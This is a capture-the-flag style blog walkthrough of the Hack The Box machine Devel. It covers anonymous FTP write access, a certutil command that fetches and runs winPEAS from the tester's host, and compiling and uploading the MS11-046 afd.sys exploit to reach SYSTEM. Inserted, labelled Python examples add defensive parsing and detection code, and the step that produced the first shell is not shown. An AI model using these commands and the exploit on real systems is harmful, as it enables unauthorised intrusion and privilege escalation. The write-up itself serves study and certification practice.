Path to OSCP: Devel

As part of my progress towards achieving Offensive Security Certified Professional certification, I’m attempting to complete all NetSecFocus OSCP-style boxes on Hack The Box, and detailing each box in this “Path to OSCP” blog series.

Next up is Devel. We begin as usual with nmap:

u01@nostromo:~ $ sudo nmap -p- -A devel.htb -oA devel
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-18 14:42 BST
Nmap scan report for devel.htb (10.10.10.5)
Host is up (0.022s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|7|2008|8.1|Vista (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 or Windows 8.1 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 (89%), Microsoft Windows 7 Professional or Windows 8 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 23.36 ms 10.10.14.1
2 23.65 ms devel.htb (10.10.10.5)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 133.46 seconds

We have both anonymous access to FTP and write access to the FTP root directory. Promising start.

u01@nostromo:~ $ ftp anonymous@devel.htb
Connected to devel.htb.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
229 Entering Extended Passive Mode (|||49186|)
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.

ftp> put /home/u01/testfile ./testfile
local: /home/u01/testfile remote: ./testfile
229 Entering Extended Passive Mode (|||49224|)
125 Data connection already open; Transfer starting.
0        0.00 KiB/s
226 Transfer complete.
ftp> dir
229 Entering Extended Passive Mode (|||49225|)
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
08-18-23  05:57PM                    0 testfile
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
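The check performed by hand above (upload a zero-byte probe, list the directory again, see whether it appeared) is easy to script once you have the listings saved. The following Python is an added example for this write-up, not code from the original post: it parses the Windows_NT-style listing that Microsoft FTP Service returns and reports which names appeared between two listings. The two listings embedded in it are constructed copies of the transcript above; nothing in it touches the network.

```python
"""Parse the MS-DOS style directory listing returned by Microsoft FTP
Service and report which entries appeared between two listings.

Added illustration for this write-up, not code from the original post.
The sample listings below are constructed to match the ftp transcript;
nothing here talks to a server."""
import re
from dataclasses import dataclass
from datetime import datetime
from typing import Dict, List, Optional

# One line of a Windows_NT listing:  MM-DD-YY  HH:MMAM/PM  <DIR>|size  name
_LINE = re.compile(
    r"^(?P<date>\d{2}-\d{2}-\d{2})\s+(?P<time>\d{2}:\d{2}[AP]M)\s+"
    r"(?:(?P<dir><DIR>)|(?P<size>\d+))\s+(?P<name>.+?)\s*$"
)


@dataclass(frozen=True)
class Entry:
    name: str
    is_dir: bool
    size: Optional[int]   # None for directories
    modified: datetime


def parse_listing(text: str) -> Dict[str, Entry]:
    """Return {name: Entry} for every listing line. FTP reply lines
    (229 ..., 125 ..., 226 ...) and the ftp> prompt are skipped."""
    entries: Dict[str, Entry] = {}
    for line in text.splitlines():
        m = _LINE.match(line.strip())
        if not m:
            continue  # not a listing line
        modified = datetime.strptime(f"{m['date']} {m['time']}", "%m-%d-%y %I:%M%p")
        entries[m["name"]] = Entry(
            name=m["name"],
            is_dir=m["dir"] is not None,
            size=None if m["dir"] else int(m["size"]),
            modified=modified,
        )
    return entries


def new_entries(before: str, after: str) -> List[str]:
    """Names present in the second listing but not in the first, sorted."""
    return sorted(set(parse_listing(after)) - set(parse_listing(before)))


def write_confirmed(before: str, after: str, probe: str) -> bool:
    """True if the probe file name shows up only in the later listing,
    i.e. the anonymous upload actually landed in the directory."""
    return probe in new_entries(before, after)


# Constructed listings mirroring the transcript (before / after the put).
BEFORE = """229 Entering Extended Passive Mode (|||49186|)
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete."""

AFTER = """229 Entering Extended Passive Mode (|||49225|)
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
08-18-23  05:57PM                    0 testfile
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete."""

if __name__ == "__main__":
    for name in new_entries(BEFORE, AFTER):
        print("new entry:", name)
    print("anonymous write confirmed:", write_confirmed(BEFORE, AFTER, "testfile"))
```

The same functions work as an audit check in the other direction: run them over before/after listings from your own FTP servers and `write_confirmed` should come back False for every anonymous session.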

Once I have a command shell on the box, I do some manual enumeration, digging around directories and reviewing the output of systeminfo. I also wanted to use an enumeration script, mainly to refresh my memory on transferring files from a Windows cmd shell and on reading the output of tools like winPEAS. We have write access to C:\Windows\Temp, so I pull winPEAS onto the box using certutil and run it:

c:\windows\system32\inetsrv>cd c:\windows\temp\test
cd c:\windows\temp\test

c:\Windows\Temp\test>certutil.exe -urlcache -split -f "http://10.10.14.12:8888/winPEAS.bat" peas.bat
certutil.exe -urlcache -split -f "http://10.10.14.12:8888/winPEAS.bat" peas.bat


**** Online ****
0000 ...
8c6a
CertUtil: -URLCache command completed successfully.

c:\Windows\Temp\test>
c:\Windows\Temp\test>dir
dir
Volume in drive C has no label.
Volume Serial Number is 137F-3971

Directory of c:\Windows\Temp\test

31/08/2023 07:12 <DIR> .
31/08/2023 07:12 <DIR> ..
31/08/2023 07:12 35.946 peas.bat
1 File(s) 35.946 bytes
2 Dir(s) 4.697.214.976 bytes free
c:\Windows\Temp\test>.\peas.bat
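From the blue-team side, the certutil command above is exactly the pattern that process command-line logging exists to catch: certutil invoked with a download verb and a URL, frequently under a process that has no business fetching files. The following Python is an added example for this write-up, not code from the original post or from any vendor rule set. It runs a small detection over a list of constructed process-creation events (the kind of fields you would get from the CommandLine of Sysmon Event ID 1 or Security event 4688 with command-line auditing enabled); the field names, the event values and the "parent is an IIS worker" heuristic are all mine.

```python
"""Flag certutil.exe being used as a file downloader from process
command-line telemetry.

Added illustration for this write-up, not code from the original post.
The events below are constructed; field names (ts, user, parent,
cmdline) are an assumption about how the telemetry is normalised."""
import re
from typing import Dict, List

# certutil verbs that fetch content from a URL (real certutil switches).
DOWNLOAD_VERBS = {"urlcache", "verifyctl"}
URL = re.compile(r"https?://\S+", re.IGNORECASE)


def is_certutil_download(cmdline: str) -> bool:
    """True if the image is certutil and the command line carries both a
    download verb (written with - or /) and an http(s) URL."""
    tokens = cmdline.lower().split()
    if not tokens:
        return False
    # Strip quotes and any directory so "C:\Windows\System32\certutil.exe"
    # and plain certutil both match. (A quoted path containing spaces would
    # be split here; a production rule should use a real Windows argv parser.)
    exe = tokens[0].strip('"').rsplit("\\", 1)[-1]
    if exe not in ("certutil", "certutil.exe"):
        return False
    switches = {t.lstrip("-/") for t in tokens[1:] if t[:1] in "-/"}
    return bool(switches & DOWNLOAD_VERBS) and URL.search(cmdline) is not None


def scan(events: List[Dict[str, str]]) -> List[Dict[str, str]]:
    """Return the events that look like a certutil download, each copied
    with an added 'reason' string for the analyst."""
    hits = []
    for ev in events:
        if not is_certutil_download(ev["cmdline"]):
            continue
        url = URL.search(ev["cmdline"]).group(0)
        reason = f"certutil fetching {url}"
        # Heuristic (my assumption, not from the post): a web-server worker
        # process spawning certutil is a stronger signal than a user shell.
        if ev.get("parent", "").lower().endswith("w3wp.exe"):
            reason += " (spawned under IIS worker process)"
        hits.append({**ev, "reason": reason})
    return hits


# Constructed telemetry, not real logs. The first line mirrors the command
# run in the transcript above; the rest exercise the negative cases.
EVENTS = [
    {"ts": "2023-08-31T07:12:00", "user": "IIS APPPOOL\\DefaultAppPool",
     "parent": "C:\\Windows\\System32\\cmd.exe",
     "cmdline": 'certutil.exe -urlcache -split -f "http://10.10.14.12:8888/winPEAS.bat" peas.bat'},
    {"ts": "2023-08-31T07:13:00", "user": "CORP\\admin",
     "parent": "C:\\Windows\\explorer.exe",
     "cmdline": "certutil.exe -hashfile C:\\installers\\setup.msi SHA256"},
    {"ts": "2023-08-31T07:14:00", "user": "IIS APPPOOL\\DefaultAppPool",
     "parent": "C:\\Windows\\System32\\inetsrv\\w3wp.exe",
     "cmdline": "C:\\Windows\\System32\\certutil.exe /urlcache /f http://203.0.113.10/x.exe x.exe"},
    {"ts": "2023-08-31T07:15:00", "user": "CORP\\admin",
     "parent": "C:\\Windows\\explorer.exe",
     "cmdline": 'powershell -c "certutil -urlcache"'},  # image is not certutil
]

if __name__ == "__main__":
    for hit in scan(EVENTS):
        print(hit["ts"], hit["user"], "->", hit["reason"])
```

The hashfile invocation and the PowerShell line are left alone on purpose: the rule keys on the certutil image plus a download verb plus a URL, which keeps it quiet on legitimate certificate-management use while still catching both the `-` and `/` switch spellings.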

I also upload and run Windows Exploit Suggester – Next Generation (WES-NG), but this box is so old that the output from both tools is overwhelming: the number of missing patches at this stage is huge, and WES-NG alone reports 236 vulnerabilities!

So rather than sift through all of those, I take the direct route and Google the Windows version and build; after this many years, if there is a well-known exploit for this build it is going to be obvious. Sure enough, a search for “Windows 7 Enterprise 6.1.7600 Build 7600”, without even adding “vulnerability” or “exploit”, brings me to MS11-046, an afd.sys local privilege escalation (Microsoft Windows (x86) – ‘afd.sys’ Local Privilege Escalation (MS11-046) – Windows_x86 local Exploit (exploit-db.com)).
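The version string that drove the search above comes straight out of systeminfo, and the same output tells you how far behind a host is before any suggester script runs. The following Python is an added example for this write-up, not code from the original post: it parses the OS name, version, build and installed-hotfix list out of systeminfo output and summarises the patch level. The two systeminfo samples are constructed (the first is shaped like the box as described in the text, with placeholder KB numbers in the second), and the build-to-service-pack table covers only the 6.1 kernel (Windows 7 / Server 2008 R2), where 7600 is the RTM build and 7601 is SP1.

```python
"""Extract OS name/version/build and installed hotfixes from `systeminfo`
output and summarise the patch level.

Added illustration for this write-up, not code from the original post.
Both samples below are constructed; KB numbers are placeholders."""
import re
from typing import Dict, List

# Kernel 6.1 (Windows 7 / Server 2008 R2) builds: 7600 is RTM, 7601 is SP1.
SP_BY_BUILD_61 = {7600: "RTM (no service pack)", 7601: "SP1"}


def parse_systeminfo(text: str) -> Dict[str, object]:
    """Return a dict with os_name, os_version, major/minor/build and the
    list of installed hotfixes. 'Hotfix(s): N/A' yields an empty list."""
    info: Dict[str, object] = {"hotfixes": []}
    hotfixes: List[str] = info["hotfixes"]  # type: ignore[assignment]
    in_hotfix = False
    for raw in text.splitlines():
        line = raw.rstrip()
        if in_hotfix:
            # Continuation lines look like "   [01]: KB1234567"
            m = re.match(r"\s+\[\d+\]:\s*(KB\d+)", line)
            if m:
                hotfixes.append(m.group(1))
                continue
            in_hotfix = False  # first non-hotfix line ends the block
        if ":" not in line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if key == "OS Name":
            info["os_name"] = value
        elif key == "OS Version":
            info["os_version"] = value
            m = re.search(r"(\d+)\.(\d+)\.(\d+)", value)
            if m:
                info["major"], info["minor"], info["build"] = (int(x) for x in m.groups())
        elif key.startswith("Hotfix(s)"):
            in_hotfix = True
    return info


def service_pack_level(info: Dict[str, object]) -> str:
    """Map a 6.1 build number to its service-pack level; anything else is
    outside the small table this example carries."""
    if (info.get("major"), info.get("minor")) == (6, 1):
        build = int(info["build"])  # type: ignore[arg-type]
        return SP_BY_BUILD_61.get(build, f"unknown 6.1 build {build}")
    return "not a 6.1 kernel; table does not apply"


def summarise(info: Dict[str, object]) -> str:
    return (f"{info.get('os_name', '?')} build {info.get('build', '?')}: "
            f"{service_pack_level(info)}, {len(info['hotfixes'])} hotfix(es) installed")  # type: ignore[arg-type]


# Constructed systeminfo excerpt shaped like the box described in the post.
UNPATCHED = """Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
OS Manufacturer:           Microsoft Corporation
System Type:               X86-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

# Constructed SP1 host with placeholder KB numbers, to exercise the hotfix block.
PATCHED = """OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7601 Service Pack 1 Build 7601
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB1111111
                           [02]: KB2222222
Network Card(s):           1 NIC(s) Installed.
                           [01]: Intel(R) PRO/1000 MT Network Connection
"""

if __name__ == "__main__":
    for sample in (UNPATCHED, PATCHED):
        print(summarise(parse_systeminfo(sample)))
```

The NIC block deliberately reuses the same `[01]:` continuation layout as the hotfix block, which is why the parser only collects continuation lines while it is inside `Hotfix(s)` and drops out at the first line that does not match.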

Searchsploit has an entry for it:

u01@nostromo:/repo/wesng$ searchsploit ms11-046
------------------------------------------------------------------------- ---------------------------
 Exploit Title                                                           | Path
------------------------------------------------------------------------- ---------------------------
Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046) | windows_x86/local/40564.c
Microsoft Windows - 'afd.sys' Local Kernel (PoC) (MS11-046)              | windows/dos/18755.c
------------------------------------------------------------------------- ---------------------------

I follow the instructions in the file comments to compile the binary:

u01@nostromo:~/HTB/devel$ i686-w64-mingw32-gcc 40564.c -o MS11-046.exe -lws2_32
u01@nostromo:~/HTB/devel$ ll
total 284
-rw-r--r-- 1 u01 u01 31852 Aug 31 15:10 40564.c
-rwxr-xr-x 1 u01 u01 239983 Aug 31 15:11 MS11-046.exe

I upload the payload (in binary mode) to the same directory as our initial shell:

u01@nostromo:~/HTB/devel$ ftp anonymous@devel.htb
Connected to devel.htb.
220 Microsoft FTP Service
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> binary
200 Type set to I.
ftp> put ~/HTB/devel/MS11-046.exe payload.exe
local: /home/u01/HTB/devel/MS11-046.exe remote: payload.exe
229 Entering Extended Passive Mode (|||49167|)
150 Opening BINARY mode data connection.
100% |***************************************************************************************************************| 234 KiB 1.27 MiB/s 00:00 ETA
226 Transfer complete.
239983 bytes sent in 00:00 (938.52 KiB/s)

And on execution we immediately get SYSTEM and can retrieve all the flags:

c:\inetpub\wwwroot>payload.exe
payload.exe

c:\Windows\System32>whoami
whoami
nt authority\system
